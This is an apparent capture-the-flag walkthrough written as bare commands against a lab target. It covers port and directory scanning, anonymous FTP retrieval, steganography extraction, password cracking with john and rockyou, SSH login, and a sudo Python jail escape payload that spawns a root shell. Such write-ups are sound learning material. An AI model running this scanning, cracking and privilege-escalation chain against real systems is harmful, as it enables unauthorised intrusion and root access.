nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
ftp $VICTIM
Username: ftp
cd need_Help?
mget Aogiri_tree.txt
cd Talk_with_me
mget *
./need_to_talk
> kamishiro
steghide extract -sf rize_and_kaneki.jpg
Password: You_found_1t
cat yougotme.txt
CyberChef was able to idenfify it was morse code and from there it was obvious the next few steps.
gobuster dir -u $VICTIM/d1r3c70ry_center/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
john --wordlist=/usr/share/wordlists/rockyou.txt passwd
ssh kamishiro@$VICTIM
Password: password123
cat /home/kamishiro/jail.py
sudo /usr/bin/python3 /home/kamishiro/jail.py
>>> __builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')